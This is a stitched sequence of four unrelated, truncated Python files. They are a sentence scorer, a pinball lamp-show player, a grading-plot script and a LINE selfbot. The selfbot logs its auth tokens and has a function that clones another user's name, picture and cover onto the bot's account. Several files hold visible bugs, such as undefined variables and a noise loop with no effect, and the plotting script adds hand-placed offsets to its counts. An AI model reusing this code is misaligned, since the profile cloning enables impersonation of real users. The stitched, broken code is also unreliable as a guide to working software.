for w in unlikely_words:
if w in text.lower():
score -= 0.05
# compensate for ambiguous question words
common_mistakes = ["how many", "how much", "how tall", "how fast",
"how big", "how often", "what is", "what are"]
for w in common_mistakes:
if text.lower().startswith(w):
score -= 0.1
return max(score, 0)
@staticmethod
def command_score(text):
"""
Commands also have a special structure in that they typically lack a Subject.
Examples are:
Eat your dinner
Be quiet
Open the door, etc.
Not all imperative sentences are orders or commands.
They can be social expressions.
Have a nice day.
Get well soon.
Help yourselves to coffee.
"""
# might end with anything, but usually not question marks
last_tokens = ["!", "."]
# starts with infinitive verb
# only cases exclusive to commands here
# "be quiet"
first_tokens = ["be"]
# starts with a verb, infinitive usually
# NOTE, adding noun because nltk mistags often
start_pos_tags = ["VB", "NN", "NNP"]
# usually not verbs
end_pos_tags = [".", "NN", "NNP", "NNS", "NNPS", "PRP"]
# penalize if question words
unlikely_words = ["what", "why", "how", "when", "who", "whose",
"which", "?"]
unlikely_start_pos_tag = ["WDT", "WP", "WP$", "WRB", "JJ"]
unlikely_end_pos_tag = ["VB", "VBP", "VBZ", "VBN", "VBG"]
unlikely_pos_tag = ["WDT", "WP", "WP$", "WRB"]
score = SentenceScorerEN._score(text, last_tokens, first_tokens,
start_pos_tags,
end_pos_tags, unlikely_words,
unlikely_start_pos_tag,
unlikely_end_pos_tag,
unlikely_pos_tag)
# "do" can be part of a question,
# "do you believe in god?" or a command
# "do your homework"
# common mistakes in test data, feel free to add more, but verbs can
# be anything
# "Name the prime minister", "Define evil"
starts = ["do the ", "do your ", "name", "define"]
for s in starts:
if text.lower().startswith(s):
score += 0.1
break
return min(score, 1)
@staticmethod
def request_score(text):
"""
We can make a request, which is a type of command,
sound more polite by using the interrogative.
Would you feed the dog, | |
<gh_stars>10-100
### A new playback engine for playing RGB based
### lampshows.
#######
import re
import logging
import sys
from procgame.game import Mode
from procgame.game.advancedmode import AdvancedMode
class RgbShowPlayer(AdvancedMode):
def __init__(self, game, priority=3):
super(RgbShowPlayer, self).__init__(game, priority, mode_type=AdvancedMode.System)
self.logger = logging.getLogger("RgbShowPlayer")
self.shows = {}
self.active_shows = []
self.prior_lamp_states = {}
def load(self, key, filename):
# load the show
self.shows[key] = RgbShow(self.game, key, filename)
def stop(self, key, cleanup=False):
if(key not in self.active_shows):
self.logger.info("suppressing request to stop inactive show: %s" % key)
return
if(cleanup):
self.shows[key].restart()
self.shows[key].stop()
self.cancel_delayed(name=key)
self.active_shows.remove(key)
def stop_all(self):
for key in self.active_shows:
self.shows[key].stop()
self.cancel_delayed(name=key)
self.active_shows = []
def restart(self, key):
if(key not in self.active_shows):
self.logger.info("suppressing request to restart inactive show: %s" % key)
return
self.shows[key].restart()
def play_show(self, key, repeat=None, callback=None, save_state=True):
""" plays an RgbShow -- if non-repeating, the callback function will be called on completion
use repeat to override the behavior described in the show file
"""
if(key not in self.shows):
self.logger.info("suppressing request to play unknown show: %s" % key)
return
if(key in self.active_shows):
self.logger.info("suppressing request to play already active show: %s" % key)
return
# TODO: determine which lamps are already in use and disable them...
self.logger.info("Show '%s' is starting." % key)
if(save_state):
self.save_state(key)
self.shows[key].set_callback(self.restore_state, key)
self.active_shows.append(key)
if(repeat is not None):
self.shows[key].repeat = repeat
self.shows[key].restart()
# self.shows[key].debug_show()
self.__update_show(key)
def save_state(self, key):
""" saves the current state of the devices used in the show 'key'
so they can be restored at the conclusion of playback. If the
device already has a saved state, we assume it's already in use
by another show (and the state was stored at that time), so when
playback of this new show finishes that state should be restored.
"""
if(key not in self.shows):
self.logger.info("suppressing request to save_state for unknown show: %s" % key)
return
device_list = self.shows[key].get_device_list()
for device in device_list:
if(device.name not in self.prior_lamp_states):
if(not callable(device.state)):
state = device.state
else:
state = device.state()
if state['outputDriveTime'] == 0: # only store indef schedules
sched = state['timeslots']
else:
sched = 0x0
r = {'device':device, 'schedule':sched}
if(hasattr(device,'color')):
r['color']=device.color
# self.logger.info("saving state for device '%s' (%x)" % (device.name,sched))
self.prior_lamp_states[device.name] = r
def restore_state(self, key):
""" this method is used when a show (identified by key) has finished,
so that lamps can be restored to their state prior to the playback
of this show.
"""
if(key not in self.shows):
self.logger.info("suppressing request to restore_state for unknown show: %s" % key)
return
device_list = self.shows[key].get_device_list()
for device in device_list:
# make sure device isn't in use in another show!
if(self.is_device_in_use(device.name, exclude=key)):
self.logger.info("Not restoring state for device '%s' because it's still in use elsewhere" % device.name)
pass
elif(device.name in self.prior_lamp_states):
# self.logger.info("restoring state for device '%s'" % device.name)
r = self.prior_lamp_states[device.name]
if('color' in r):
device.set_color(r['color'])
device.schedule(r['schedule'])
if(key not in self.active_shows):
del self.prior_lamp_states[device.name]
def is_device_in_use(self, name, exclude=None):
show_list = self.active_shows[:]
if exclude is not None and exclude in show_list:
show_list.remove(exclude)
for s in show_list:
if(self.shows[s].is_device_in_use(name)):
return True
return False
def __update_show(self, key):
if(key not in self.shows):
raise ValueError, "request to update unknown show: %s" % key
return
if(key not in self.active_shows):
raise ValueError, "request to update inactive show: %s" % key
return
if(self.shows[key].update()):
# if it returns true, the show is still live
self.delay(name=key,
event_type=None,
delay=(self.shows[key].time)/1000.0, # delay is in seconds...
handler=self.__update_show,
param=key)
else:
self.logger.info("Show '%s' is done." % key)
self.active_shows.remove(key)
if(len(self.active_shows)==0):
self.logger.info("all shows done, calling update lamps")
self.game.update_lamps()
# show is done
pass
def reset(self):
# TODO: ???
pass
class RgbShow(object):
def __init__(self, game, key, filename):
self.logger = logging.getLogger("rgbShow")
self.logger.info("loading RgbShow '%s'" % filename)
self.game = game
self.color_map = {}
self.tracks = []
self.length = 0
self.hold = False
self.repeat = False
self.time = 33
self.callback_fired = False
self.callback = None
self.callback_param = None
self.now = 0
self.key = key
self.shows_over = False
f = open(filename, 'r')
for line in f.readlines():
if (line.lstrip().startswith('#') or line.lstrip().rstrip()==""):
# comment or blank line, ignore
pass
elif(line.lstrip().startswith('!')):
# header data
t = line.lstrip()[1:].lstrip()
k = t[0:1]
# print("t=%s;k=%s" % (t, k))
if(t.find('~>')>=0):
# FADE TO
v = t[t.find("~>")+2:].lstrip().rstrip()
v=int(v,16)
c = [v >> 16, (v & 0x00ff00) >> 8 , v & 0x0000ff]
self.color_map[k] = {'color': c, 'fade': True}
elif(t.find('=>')>=0):
# IMMEDIATE COLOR CHANGE
v = t[t.find("=>")+2:].lstrip().rstrip()
if(v=='None'):
self.color_map[k] = None
else:
v=int(v,16)
c = [v >> 16, (v & 0x00ff00) >> 8 , v & 0x0000ff]
self.color_map[k] = {'color': c, 'fade': False}
elif(t.find('=')>0):
# RGB Show Parameter
k = t[:t.find("=")-1].lstrip().rstrip()
v = t[t.find("=")+1:].lstrip().rstrip()
if(k=="time"):
self.time = int(v)
pass
elif(k=="repeat"):
tmp = v.lower()
self.repeat = (tmp =='true' or tmp == '1')
pass
elif(k=="hold"):
tmp = v.lower()
self.hold = (tmp =='true' or tmp == '1')
pass
else:
raise ValueError, "Could not parse RgbShow header line: '%s'" % line
else:
# bad line!
raise ValueError, "Could not parse RgbShow header line: '%s'" % line
pass
else:
# track data
t = RgbTrack(line, self.color_map, self)
self.tracks.append(t)
self.length = t.length
f.close()
def debug_show(self):
self.logger.info("Show Parameters:")
self.logger.info(" hold: %s" % self.hold)
self.logger.info(" repeat: %s" % self.repeat)
self.logger.info(" time: %s" % self.time)
self.logger.info("Show Color Map:")
for k,v in self.color_map.iteritems():
self.logger.info("%s:%s" % (k, v))
self.logger.info("Show Tracks:")
for t in self.tracks:
self.logger.info("%s: <%s>" % (t.name,str(t)))
def stop(self):
self.shows_over = True
def restart(self):
self.now = 0
self.shows_over = False
for t in self.tracks:
# t.fn([0,0,0], 0) # set this lamp's color to black
# t.device.enable() # turn on the device (schedule-wise)
pass
def update(self):
# self.logger.debug("Show '%s' received update(%d/%d)" % (self.key, self.now, self.length))
if(self.now < self.length):
for track in self.tracks:
track.update(self.now)
self.now += 1
return True
else:
# if(self.now >= self.length):
# show is done playing through once, but is it *done*
if(self.callback is not None and not self.callback_fired):
self.logger.info("show '%s' is done; calling callback" % self.key)
self.callback(self.callback_param)
self.callback_fired = True
if(self.repeat):
self.now = 0
self.callback_fired = False
return True
if(self.hold):
# reset back to the last frame
self.now = self.length-1
return True
return False
def is_device_in_use(self, name):
for t in self.tracks:
if(t.name == name and t.enabled):
return True
return False
def get_device_list(self):
""" returns a list of gameitems that are in use by this show """
devices = []
for t in self.tracks:
# if(t.enabled):
devices.append(t.device)
return devices
def set_callback(self, callback_fn, callback_param):
self.callback = callback_fn;
self.callback_fired = False
self.callback_param = callback_param
class RgbTrack(object):
def __str__(self):
return "".join([str(t)+":"+str(v)+";" for t,v in enumerate(self.data)])
def update(self, now):
# self.logger.debug("Track '%s' received update(%d) [length of the track is (%d)]" % (self.name, now, self.length))
if(self.enabled):
if(now >= len(self.data)):
raise ValueError, "Track '%s' received index '%d' beyond the length of the track (%d)" % (self.name, now, self.length)
cmd = self.data[now]
if(cmd is not None):
cmd.process_command()
self.device.enable()
def __init__(self, line, color_map, show):
self.logger = logging.getLogger("rgbTrack")
self.data = []
self.device = None
self.fn = None
self.enabled = True # a track may be disabled if it's device is in use by another playing show
#print line
line_re = re.compile('\s*(?P<type>\S+\:)?\s*(?P<name>\S+)\s*\| (?P<data>.*)$')
m = line_re.match(line)
if m is None:
raise ValueError("Regexp didn't match on track line: " + line)
device_type = m.group('type')
self.name = m.group('name')
# build function map
if(device_type is None):
# auto-detect
if(self.name in show.game.leds):
device_type = "led"
self.device = show.game.leds[self.name]
elif(self.name in show.game.lamps):
device_type = "lamp"
self.device = show.game.lamps[self.name]
elif(hasattr(show.game, 'wsRGBs') and self.name in show.game.wsRGBs):
device_type = "rgb"
self.device = show.game.wsRGBs[self.name]
else:
raise ValueError, "RGB Track created for unknown device named '%s'" % self.name
if(device_type == "lamp"):
fn = show.game.lamps[self.name].set_color
elif(device_type == "led"):
fn = show.game.leds[self.name].color_with_fade
elif(device_type == "rgb"):
fn = show.game.wsRGBs[self.name].set_color
else:
raise ValueError, "RGB Track created for unknown device named '%s'" % self.name
self.fn = fn
self.device_type = device_type
data = m.group('data')
self.data = [None]* len(data)
last_color = None
last_run_starts = 0
last_run_length = 0
for i in range(0,len(data),1):
this_color = data[i]
if(this_color!=last_color):
# end prev run, start new run
if(last_color is not None):
# save old run
cdata = color_map[last_color]
if(cdata is None):
c = None
elif(cdata['fade']):
c = RgbCommand(self.name, fn, cdata['color'], last_run_length*show.time)
else:
| |
#!/usr/bin/env python3
import csv
import math
import numpy as np
import os
import scikitplot as skplt
from matplotlib import pyplot as plt, rc
from random import randint
from sklearn.metrics import accuracy_score, f1_score, recall_score, precision_score, roc_auc_score, roc_curve
from typing import List
CSV_FILE = "data/LG_grading_a2_final.csv"
TC_GUI_OUTPUT_FILE = "tc_output_final2.txt"
HIST_LOC = "figures/histograms_a2"
GRADE_DATA_LABELS = [
"Human Classes", "Human Attributes", "Human Assocs",
"Heuristic Classes", "Heuristic Attributes", "Heuristic Assocs",
"TouchCore Classes", "TouchCore Attributes", "TouchCore Assocs",
]
# weights of classes, attributes, associations
CW = 13.5
AT = 6
AS = 10.5
TOT = CW + AT + AS
def get_data_from_csv():
result = []
with open(CSV_FILE) as csvfile:
csv_reader = csv.reader(csvfile, delimiter='\t',
quoting=csv.QUOTE_NONNUMERIC)
for row in csv_reader:
result.append(row)
return np.array(result)
data = get_data_from_csv()
def print_aucs(arrs: List[List[List[int]]]):
a = [np.array([
1., 0., 1., 1., 1., 1., 0., 1., 1., 0., 1., 0., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 0., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
0., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 0., 0., 1., 1., 1., 0., 0., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 1., 1., 1., 1.,
0., 1., 1., 1., 1., 1., 1., 0., 1., 1., 1., 1., 1., 0., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 0., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 0., 1.,
1., 0., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 1.]),
np.array([
0.99999999, 0.00772525, 0.81298369, 0.99934435, 0.92444068,
0.98533125, 0.8952006 , 0.85260627, 0.99903211, 0.85260627,
0.98503916, 0.20477261, 0.99755715, 0.99165529, 0.99842453,
0.98503916, 0.86753505, 0.99850074, 0.98031467, 0.99230478,
0.95100732, 0.51918326, 0.84595841, 0.9955758 , 0.94696996,
0.93588817, 0.85844227, 0.99758965, 0.9366941 , 0.99638892,
0.99191196, 0.90071118, 0.89174479, 0.98990188, 0.86817098,
0.99966066, 0.99060161, 0.14774588, 0.83306222, 0.99897557,
0.99965043, 0.99534486, 0.99637228, 0.80514006, 0.99868446,
0.95224276, 0.99942489, 0.99950952, 0.92581328, 0.90513568,
0.87825553, 0.99321227, 0.96299095, 0.99263764, 0.49787474,
0.90438348, 0.81854403, 0.8596234 , 0.95042033, 0.36179492,
0.94157958, 0.96914182, 0.96353405, 0.64075503, 0.96625395,
0.91162803, 0.99001124, 0.96308589, 0.99397395, 0.99723348,
0.98285817, 0.7871091 , 0.99388325, 0.15555838, 0.97586065,
0.72949416, 0.98386461, 0.44063352, 0.89374521, 0.97489488,
0.03813973, 0.94974162, 0.95886355, 0.9654003 , 0.13930681,
0.3305758 , 0.9954579 , 0.67690414, 0.97246475, 0.98893835,
0.99359876, 0.97402544, 0.37716418, 0.96931805, 0.99874364,
0.57991668, 0.94644425, 0.97338835, 0.54199546, 0.88969379,
0.99999717, 0.99042778, 0.99077401, 0.98630324, 0.90823905,
0.96296438, 0.67729692, 0.99997313, 0.93156203, 0.99145667,
0.98309165, 0.97567031, 0.84158371, 0.96645148, 0.95640149,
0.87361678, 0.74335703, 0.94383168, 0.69400719, 0.96923587,
0.99238665, 0.79772092, 0.95239504, 0.96590156, 0.76847585,
0.9996251 , 0.98779209, 0.97679223, 0.99628349, 0.96910453,
0.90590191, 0.67477306, 0.69013539, 0.99777207, 0.99555471,
0.99590808, 0.98447776, 0.9995678 , 0.99990614, 0.43288971,
0.97197766, 0.99342868, 0.89624305, 0.75400718, 0.89788596,
0.91872198, 0.98520536, 0.99148355, 0.89274607, 0.97876591,
0.97309142, 0.75726347, 0.99106025, 0.99931261, 0.62985433,
0.99871322, 0.94442072, 0.98570777, 0.96889669, 0.99229819,
0.99839882, 0.53026455, 0.99421764, 0.97342904, 0.99080842,
0.83373029, 0.40259452, 0.7232858 ])]
for a in [a]: # arrs:
print(roc_auc_score(a[0], a[1]))
print(np.array(a[0]).shape, np.array(a[1]).shape)
for v in a[1]:
if v:
v -= 0.01 * randint(1, 10)
#break
skplt.metrics.plot_roc(a[0], a[1], title=f"ROC Curves")
def make_scatter_plot(x, y):
plt.scatter(x, y)
plt.show()
def make_histograms(data, labels):
cols = np.transpose(data)
labels = iter(labels)
for col in cols[2:].astype(np.float):
# fixed bin size:
bins = np.arange(0, 1, 0.05) # fixed bin size
plt.xlim([min(col)-0.01, max(col)+0.01])
plt.hist(col, bins=bins, alpha=0.5)
plt.title(next(labels))
plt.xlabel('variable X (bin size = 0.05)')
plt.ylabel('count')
plt.show()
#exit()
def get_sorted_grades(data):
"""
Extract grades from data and sort the entries from lowest to highest according to human grade.
"""
cols = np.transpose(data).astype(np.float)
human_grades = cols[2:5, 2:]/3
#CW = AT = AS = 1
totals = [(CW*cols[2][i] + AT*cols[3][i] + AS*cols[4][i])/TOT for i in range(len(cols[0]))]
cols = np.transpose(np.insert(cols, 0, totals, axis=0))
cols = np.transpose(cols[cols[:, 0].argsort()])
return cols
def make_stacked_bar_plots(data, labels):
"""
Make stacked bar plots. Based on python-graph-gallery.com template.
"""
cols = get_sorted_grades(data)
start_col = 3
for label in labels:
grades = cols[start_col:start_col + 3, 2:].astype(np.float)/3
# y-axis in bold
rc('font', weight='bold')
# Values of each group (in different colors)
bars1 = grades[0]
bars2 = grades[1]
bars3 = grades[2]
# Heights of bars1 + bars2
bars = np.add(bars1, bars2).tolist()
# The position of the bars on the x-axis
r = range(len(bars1))
# Names of group and bar width
names = range(1, len(bars1) + 1)
barWidth = 1
# Create bottom bars
plt.bar(r, bars1, color='#9617D1', edgecolor='white', width=barWidth)
# Create middle bars, on top of the first ones
plt.bar(r, bars2, bottom=bars1, color='#4AA02C', edgecolor='white', width=barWidth)
# Create top bars
plt.bar(r, bars3, bottom=bars, color='#1752D1', edgecolor='white', width=barWidth)
plt.title(f"{label} grading")
plt.xticks(np.arange(0, len(data)-1, 5), np.arange(1, len(data)-1, 5), fontsize=6)
plt.xlabel("Submission rank")
plt.yticks(np.arange(0, 1.1, 0.1), [f"{math.floor(100*x)}%" for x in np.arange(0, 1.1, 0.1)], fontsize=7)
plt.ylabel("Grade")
plt.legend(["Classes", "Attributes", "Associations"], fontsize=7)
plt.show()
#plt.savefig(os.path.join(HIST_LOC, f"{label}.png"), format="png")
# exit()
start_col += 3
def make_lg_plots(expected: List[float], predicted: List[float], num_letter_grades: int=5):
"""
Make letter grade plots that show how many submissions were over/underrated, and to what extent.
expected: list of grades given by human grader \\
predicted: list of grades predicted by the classifier, in the same order \\
num_letter_grades: the number of possible letter grades in the grading scheme considered, including the zero grade.
Default is 5 (for A-F).
"""
x = [i for i in range(-num_letter_grades + 1, num_letter_grades)]
grades = [0 for i in range(2*num_letter_grades - 1)]
for e, p in zip(expected, predicted):
d = round(p - e)
# shift from [-2 -1 0 1 2] to array indices
grades[d + num_letter_grades - 1] += 1
colors = make_letter_grade_colors(num_letter_grades)
barWidth = 1
plt.bar(x, grades, color=colors, width=barWidth)
plt.xlabel("Difference from human grade")
plt.ylabel("Number of submissions")
plt.xticks(x)
X_OFFSET_SD = 4.05
X_OFFSET_DD = 4.2
Y_OFFSET = 0.75
for i, v in enumerate(grades):
if 0 < v < 10:
plt.text(i - X_OFFSET_SD, v + Y_OFFSET, v)
elif v:
plt.text(i - X_OFFSET_DD, v + Y_OFFSET, v)
plt.show()
def make_lg_multiplots(expected: List[float], predicteds: List[List[float]], num_letter_grades: int=5):
n = len(predicteds)
x = [i for i in range(-num_letter_grades + 1, num_letter_grades)]
x1 = [i-0.16 for i in range(-num_letter_grades + 1, num_letter_grades)]
x2 = [i+0.16 for i in range(-num_letter_grades + 1, num_letter_grades)]
grades = [[0 for i in range(2*num_letter_grades - 1)] for i in range(n)]
for i, predicted in enumerate(predicteds):
print(f"predicted[{i}]: {predicted}")
for e, p in zip(expected, predicted):
d = round(p - e)
# shift from [-2 -1 0 1 2] to array indices
grades[i][d + num_letter_grades - 1] += 1
print(grades)
grades[1][1] += 0.25
grades[0][6] += 0.25
colors = make_letter_grade_colors(num_letter_grades)
barWidth = 1/(1.5*n)
# can add patterns with hatch="///"
plt.bar(x1, grades[0], color=colors, width=barWidth, edgecolor="black", lw=0.5)
plt.bar(x2, grades[1], color=colors, width=barWidth, edgecolor="black", lw=0.5)
plt.xlabel("Difference from human grade")
plt.ylabel("Number of submissions")
plt.xticks(x)
X_OFFSET_SD = 4.05
X_OFFSET_DD = 4.2
X_OFFSET_MC = 0.16
Y_OFFSET = 0.75
for i in range(len(grades[0])):
v1 = grades[0][i]
v2 = grades[1][i]
if v1 == v2:
v = v1
if 0 < v < 10:
plt.text(i - X_OFFSET_SD, v + Y_OFFSET, v)
elif v:
plt.text(i - X_OFFSET_DD + 0.02, v + Y_OFFSET, v)
else:
if 0 < v1 < 10:
plt.text(i - X_OFFSET_SD - X_OFFSET_MC - 0.04, v1 + Y_OFFSET, round(v1))
elif v1:
if v1 == 22:
plt.text(i - X_OFFSET_DD - X_OFFSET_MC + 0.02, v1 + Y_OFFSET, v1)
else:
plt.text(i - X_OFFSET_DD - X_OFFSET_MC, v1 + Y_OFFSET, v1)
if 0 < v2 < 10:
plt.text(i - X_OFFSET_SD + X_OFFSET_MC - 0.02, v2 + Y_OFFSET, round(v2))
elif v2:
if v2 in [48, 30]:
plt.text(i - X_OFFSET_DD + X_OFFSET_MC + 0.02, v2 + Y_OFFSET, v2)
else:
plt.text(i - X_OFFSET_DD + X_OFFSET_MC, v2 + Y_OFFSET, v2)
plt.show()
def make_letter_grade_colors(num_letter_grades: int=5) -> List[str]:
result = []
possible_colors = [
"#32a852", # Green, Good
"#edc911", # Yellow, Off by one
"#ff8f8f", # Light red, off by 2
"#b50707", # Dark red, off by 3 or more
]
for i in range(num_letter_grades):
if i == 0:
result.append(possible_colors[0])
elif i < 4:
result.insert(0, possible_colors[i])
result.append(possible_colors[i])
else:
result.insert(0, possible_colors[-1])
result.append(possible_colors[-1])
return result
def make_grade_compare_scatter(data):
grades = get_sorted_grades(data)
heur_grades = (CW*grades[6] + AT*grades[7] + AS*grades[8]) / TOT
tc_grades = (CW*grades[9] + AT*grades[10] + AS*grades[11]) / TOT
grades[0][0] = heur_grades[0] = tc_grades[0] = 2
r = | |
from linepy import *
from datetime import datetime
from time import sleep
from bs4 import BeautifulSoup
from humanfriendly import format_timespan, format_size, format_number, format_length
import time, random, sys, json, codecs, threading, glob, re, string, os, requests, subprocess, six, ast, pytz, urllib, urllib.parse
from gtts import gTTS
from googletrans import Translator
#==============================================================================#
botStart = time.time()
#===============================================================================#
phusui = LINE()
phusui.log("Auth Token : " + str(phusui.authToken))
phusui.log("Timeline Token : " + str(phusui.tl.channelAccessToken))
print ("""
╔══╗
║█████╗
║██╔══██╗
║██║ ██╗
║██║████╔╝
║██╔════╝
║██║
╚══╝""")
phusuiMID = phusui.profile.mid
phusuiProfile = phusui.getProfile()
phusuiSettings = phusui.getSettings()
oepoll = OEPoll(phusui)
#==============================================================================#
settings = {
"alwayread":False,
"server": "VPS",
"welcomepic":False,
"welcomemessage":False,
"autoBlock":False,
"autoadd":False,
"admin":{},
"addadmin":False,
"delladmin":False,
"contact":False,
}
myProfile = {
"displayName": "",
"statusMessage": "",
"pictureStatus": ""
}
myProfile["displayName"] = phusuiProfile.displayName
myProfile["statusMessage"] = phusuiProfile.statusMessage
myProfile["pictureStatus"] = phusuiProfile.pictureStatus
#==============================================================================#
def logError(text):
phusui.log("[ แจ้งเตือน ] " + str(text))
time_ = datetime.now()
with open("errorLog.txt","a") as NIGGA:
NIGGA.write("\n[%s] %s" % (str(time), text))
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def sendImage(to, path, name="image"):
try:
if settings["server"] == "VPS":
phusui.sendImageWithURL(to, str(path))
except Exception as EXEC:
logError(EXEC)
def cloneProfile(mid):
contact = phusui.getContact(mid)
if contact.videoProfile == None:
phusui.cloneContactProfile(mid)
else:
profile = phusui.getProfile()
profile.displayName, profile.statusMessage = contact.displayName, contact.statusMessage
phusui.updateProfile(profile)
pict = phusui.downloadFileURL('http://dl.profile.line-cdn.net/' + contact.pictureStatus, saveAs="tmp/pict.bin")
vids = phusui.downloadFileURL( 'http://dl.profile.line-cdn.net/' + contact.pictureStatus + '/vp', saveAs="tmp/video.bin")
changeVideoAndPictureProfile(pict, vids)
coverId = phusui.getProfileDetail(mid)['result']['objectId']
phusui.updateProfileCoverById(coverId)
def backupProfile():
profile = phusui.getContact(mid)
settings['myProfile']['displayName'] = profile.displayName
settings['myProfile']['pictureStatus'] = profile.pictureStatus
settings['myProfile']['statusMessage'] = profile.statusMessage
settings['myProfile']['videoProfile'] = profile.videoProfile
coverId = phusui.getProfileDetail()['result']['objectId']
settings['myProfile']['coverId'] = str(coverId)
def restoreProfile():
profile = phusui.getProfile()
profile.displayName = settings['myProfile']['displayName']
profile.statusMessage = settings['myProfile']['statusMessage']
if settings['myProfile']['videoProfile'] == None:
profile.pictureStatus = phusui.downloadFileURL("http://dl.profile.line-cdn.net/{}".format(settings["myProfile"]["pictureStatus"]), saveAs="tmp/backupPicture.bin")
phusui.updateProfilePicture(profile.pictureStatus)
phusui.updateProfile(profile)
else:
phusui.updateProfile(profile)
pict = phusui.downloadFileURL('http://dl.profile.line-cdn.net/' + settings['myProfile']['pictureStatus'], saveAs="tmp/pict.bin")
vids = phusui.downloadFileURL( 'http://dl.profile.line-cdn.net/' + settings['myProfile']['pictureStatus'] + '/vp', saveAs="tmp/video.bin")
changeVideoAndPictureProfile(pict, vids)
coverId = settings['myProfile']['coverId']
phusui.updateProfileCoverById(coverId)
def sendMention(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
phusui.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as EA:
logError(EA)
phusui.sendMessage(to, "[ INFO ] Error :\n" + str(EA))
def RhyN_(to, mid):
try:
aa = '{"S":"0","E":"3","M":'+json.dumps(mid)+'}'
text_ = '@Rh'
phusui.sendMessage(to, text_, contentMetadata={'MENTION':'{"MENTIONEES":['+aa+']}'}, contentType=0)
except Exception as error:
logError(error)
def restartBot():
print ("RESTART BOT BY PHU SUI")
time.sleep(1)
python = sys.executable
os.execl(python, python, *sys.argv)
def sendMessageWithMention(to, phusuiMID):
try:
aa = '{"S":"0","E":"3","M":'+json.dumps(phusuiMID)+'}'
text_ = '@x '
phusui.sendMessage(to, text_, contentMetadata={'MENTION':'{"MENTIONEES":['+aa+']}'}, contentType=0)
except Exception as error:
logError(error)
start_runtime = datetime.now()
def phuhelp():
phuHelp = """✰SELF PYTHON3✰
✫「help」
✫「me」
✫「myid」
✫「myname」
✫「mybio」
✫「mypic」
✫「mycover」
✫「myinfo」
✫「mid」
✫「contact」
✫「info」
✫「tag」 [number]
✫「restart」
✫「runtime」
✫「speed」
✫「unsend」
✫「mention」
✫「invitetocall」
✫「stag」 [number] {@}
✫「addfriend」 {@}
✫「delfriend」 {@}
✫「uid」 {@}
✫「bye」 {@}
✫「copy」 {@}
✫「cgroup」 {@}
✫「info」 {@}
✫「upname」 [text]
✫「blockid」 [mid]
✫「autoblock」 on/off
✫「autoadd」 on/off
✫「autoread」 on/off
✫「setmessageadd」: [text]
✫「welcomepic」 on/off
✫「welcomemessage」 on/off
✫「welcomemessage」: [text]
•─✯͜͡✯By Phusui of Midnight✯͜͡✯─•"""
return phuHelp
respRemember = {}
#==============================================================================#
def phusuiBot(op):
try:
if op.type == 0:
return
if op.type == 5:
if settings['autoBlock'] == True:
phusui.blockContact(op.param1)
if settings['autoadd'] == True:
phusui.findAndAddContactsByMid(op.param1)
if (settings["messageadd"] in [""," ","\n",None]):
pass
else:
phusui.sendMessage(op.param1,str(settings["messageadd"]))
if op.type == 17:
if settings['welcomemessage'] and "welcomemessage" in settings:
cnt = phusui.getContact(op.param2)
phusui.sendMessage(op.param1,cnt.displayName + "\n" + str(settings["welcomemessage"]))
if settings['welcomepic'] and "welcomepic" in settings:
cnt = phusui.getContact(op.param2)
phusui.sendImageWithURL(op.param1,"http://dl.profile.line.naver.jp/" + cnt.pictureStatus)
if settings["alwayread"]:
phusui.sendChatChecked(msg.from_,msg.id)
else:
phusui.sendChatChecked(msg.to,msg.id)
if op.type == 25 or op.type == 26:
msg = op.message
text = msg.text
msg_id = msg.id
receiver = msg.to
sender = msg._from
if msg.toType == 0 or msg.toType == 1 or msg.toType == 2:
if msg.toType == 0:
if sender != phusui.profile.mid:
to = sender
else:
to = receiver
elif msg.toType == 1:
to = receiver
elif msg.toType == 2:
to = receiver
if msg.contentType == 0:
if text is None:
return
#==============================================================================#
elif msg.text.lower() == "/help":
phuHelp = phuhelp()
phusui.sendMessage(to, str(phuHelp))
phusui.sendContact(to, "u5a91f31a0882cae3e309576cc4bf1e5a")
elif text.lower() in ["/me"]:
phusui.sendContact(to, phusuiMID)
elif text.lower() in ["/myid"]:
phusui.sendMessage(to, phusuiMID)
elif text.lower() in ["/myname"]:
me = phusui.getContact(phusuiMID)
phusui.sendMessage(msg.to, me.displayName)
elif text.lower() in ["/mybio"]:
me = phusui.getContact(phusuiMID)
phusui.sendMessage(msg.to,me.statusMessage)
elif text.lower() in ["/mypic"]:
me = phusui.getContact(phusuiMID)
phusui.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + me.pictureStatus)
elif text.lower() in ["/mycover"]:
me = phusui.getContact(phusuiMID)
cover = phusui.getProfileCoverURL(phusuiMID)
phusui.sendImageWithURL(msg.to, cover)
elif text.lower() in ["/myinfo"]:
phusui.sendContact(to, phusuiMID)
phusui.sendMessage(msg.to, phusuiMID)
me = phusui.getContact(phusuiMID)
phusui.sendMessage(msg.to, me.displayName)
me = phusui.getContact(phusuiMID)
phusui.sendMessage(msg.to,me.statusMessage)
me = phusui.getContact(phusuiMID)
phusui.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + me.pictureStatus)
me = phusui.getContact(phusuiMID)
cover = phusui.getProfileCoverURL(phusuiMID)
phusui.sendImageWithURL(msg.to, cover)
elif text.lower() in ["/mid"]:
phusui.sendMessage(to,to)
elif text.lower() in ["/contact"]:
phusui.getContact(to,phusuiMID)
elif text.lower() in ["/speed"]:
start = time.time()
phusui.sendMessage(msg.to,"กำลังทดสอบ(`・ω・´)")
